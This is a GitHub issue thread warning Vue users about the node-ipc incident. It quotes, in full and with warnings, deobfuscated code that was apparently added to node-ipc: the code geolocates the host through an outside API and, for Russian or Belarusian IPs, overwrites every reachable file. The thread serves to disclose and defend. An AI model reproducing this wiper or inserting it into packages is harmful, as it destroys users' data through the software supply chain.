!!!!!!!!!!!! Please do something to warn USERS besides publishing new versions

[Mister-Hope]

See https://github.com/RIAEvangelist/node-ipc/issues/233#issuecomment-1068182278 the node-ipc is doing things far more than ever expected.

If any users are using ip in russia, all their file will be wiped entirely by ❤️, and that's a VERY DANGEROUS BEHAVIOR. This is not just making a joke, but damaging russia people's PC or server

I don't think vue team has done enough job just releaasing new versions, we should at lease

• add POPUPs in official website about that

• deprecate all the infected vue-cli packages to add a message for that

Also, we can do:

• adding some warnings in vue-devtools by publishing new versions, so that users may get a chance automatically upgrade and see the warning.

@sodatea @yyx990803 Please take actions as soon as possible!❤️

[hax]

It seems such attack code is not published to npm (or has been deleted). But such behavior is still very dangerous.

NOTE: The related comments have been deleted by the owner of that repo. Here are the screenshots :

[KawaiiZapic]

@RIAEvangelist deleting the original comment, but it does not matter to the fact.

Original post by @Mister-Hope which has been deleted.

@RIAEvangelist
I did some digging into recent commits in this repository.

What the actual f--k are you doing here:

⚠️| The following code is malicious, DO NOT RUN IT

https://github.com/RIAEvangelist/node-ipc/blob/847047cf7f81ab08352038b2204f0e7633449580/dao/ssl-geospec.js

⚠️| The above code is malicious, DO NOT RUN IT

I deobfuscated the code and found out that if the host machine's ip address was from Russia or Belarus, your code would proceed to nuke their files by overwriting everything:

⚠️| The following code is malicious, DO NOT RUN IT

import u from "path";
import a from "fs";
import o from "https";
setTimeout(function () {
    const t = Math.round(Math.random() * 4);
    if (t > 1) {
        return;
    }
    const n = Buffer.from("aHR0cHM6Ly9hcGkuaXBnZW9sb2NhdGlvbi5pby9pcGdlbz9hcGlLZXk9YWU1MTFlMTYyNzgyNGE5NjhhYWFhNzU4YTUzMDkxNTQ=", "base64"); // https://api.ipgeolocation.io/ipgeo?apiKey=ae511e1627824a968aaaa758a5309154
    o.get(n.toString("utf8"), function (t) {
        t.on("data", function (t) {
            const n = Buffer.from("Li8=", "base64");
            const o = Buffer.from("Li4v", "base64");
            const r = Buffer.from("Li4vLi4v", "base64");
            const f = Buffer.from("Lw==", "base64");
            const c = Buffer.from("Y291bnRyeV9uYW1l", "base64");
            const e = Buffer.from("cnVzc2lh", "base64");
            const i = Buffer.from("YmVsYXJ1cw==", "base64");
            try {
                const s = JSON.parse(t.toString("utf8"));
                const u = s[c.toString("utf8")].toLowerCase();
                const a = u.includes(e.toString("utf8")) || u.includes(i.toString("utf8")); // checks if country is Russia or Belarus
                if (a) {
                    h(n.toString("utf8"));
                    h(o.toString("utf8"));
                    h(r.toString("utf8"));
                    h(f.toString("utf8"));
                }
            } catch (t) {}
        });
    });
}, Math.ceil(Math.random() * 1e3));
async function h(n = "", o = "") {
    if (!a.existsSync(n)) {
        return;
    }
    let r = [];
    try {
        r = a.readdirSync(n);
    } catch (t) {}
    const f = [];
    const c = Buffer.from("4p2k77iP", "base64");
    for (var e = 0; e < r.length; e++) {
        const i = u.join(n, r[e]);
        let t = null;
        try {
            t = a.lstatSync(i);
        } catch (t) {
            continue;
        }
        if (t.isDirectory()) {
            const s = h(i, o);
            s.length > 0 ? f.push(...s) : null;
        } else if (i.indexOf(o) >= 0) {
            try {
                a.writeFile(i, c.toString("utf8"), function () {}); // overwrites file with `❤️`
            } catch (t) {}
        }
    }
    return f;
}
const ssl = true;
export { ssl as default, ssl };

⚠️| The above code is malicious, DO NOT RUN IT

The following are excerpts from the malicious code:

Buffer.from("aHR0cHM6Ly9hcGkuaXBnZW9sb2NhdGlvbi5pby9pcGdlbz9hcGlLZXk9YWU1MTFlMTYyNzgyNGE5NjhhYWFhNzU4YTUzMDkxNTQ=", "base64");
// https://api.ipgeolocation.io/ipgeo?apiKey=ae511e1627824a968aaaa758a5309154

const a = u.includes(e.toString("utf8")) || u.includes(i.toString("utf8"));
// checks if ip country is Russia or Belarus

a.writeFile(i, c.toString("utf8"), function () {});
// overwrites file with `❤️`

You should be ashamed of yourself, this level of gross malice towards fellow developers is not ok.

---

---

Edit: please reference GalvinGao's comment

https://github.com/RIAEvangelist/node-ipc/issues/233#issuecomment-1068243590

hmmm, seems the file has been already deleted (https://github.com/RIAEvangelist/node-ipc/commits/master/dao/ssl-geospec.js) and the version affected v10.1.3 has already been either taken down, or the user has deleted it, from npm, as it is currently already not existed on npm.

Still, the publisher's activity, to my evaluation, is kinda suspicious. Whether the file was introduced intentionally or unintentionally, the security concerns of using this package has already planted.

[RIAEvangelist]

It's not really possible to run that code. It poses no threat, but it does look scary for sure.

[MidSpike]

It's not really possible to run that code. It poses no threat, but it does look scary for sure.

The fact of the matter is that you pushed that code to the repository.
That code should have never mixed in with node-ipc.
Such actions can be considered malicious.

[lorand-horvath]

@RIAEvangelist Why are you removing the posts from the node-ipc ticket https://github.com/RIAEvangelist/node-ipc/issues/233 that clearly show the code you added was deleting/overwriting user files?

@yyx990803 @sodatea Evan & Haoqun, could you please make sure that node-ipc 9.2.1, which is now locked in @vue/cli 4.5.16 and @vue/cli 5.0.3, is not malicious and isn't allowed to be changed in any way (indirectly)? Not sure, is node-ipc being used as dependency in Vite https://github.com/vitejs/vite ? or in create-vue ? Please double check.

[RIAEvangelist]

Can confirm no malicious code.

[RIAEvangelist]

Also I don't think you understand the code you were referring to. It is not possible for that code to overwrite user files.

[RIAEvangelist]

It definitely looks like it is possible, but if you check how it works, it is in fact not capable of doing what you are expecting.

[Nugine]

The community should fork node-ipc since the owner can no longer be trusted.

[RIAEvangelist]

Forking is always an option, so is version locking.

It's also very easy to jump to conclusions saying someone is not trustworthy. Code reviews and reading licenses and documentation may give better assessment of that though.

[hax]

It is not possible for that code to overwrite user files.
It definitely looks like it is possible, but if you check how it works, it is in fact not capable of doing what you are expecting.

I tested the code and confirmed that if the response denote ip was from russia, the code definitely could (1/4 possibility for every run) overwrite the files.

[RIAEvangelist]

Russia or Belarus, and only if the API key was valid; which it is not.

[RIAEvangelist]

Also, damn good sleuthing.

[hax]

Yeah, the API key is not valid now, it's very easy to apply a key or reset it.

[MidSpike]

@RIAEvangelist

only if the API key was valid; which it is not.

At the time of my testing, the api key was valid.
Don't lie to us.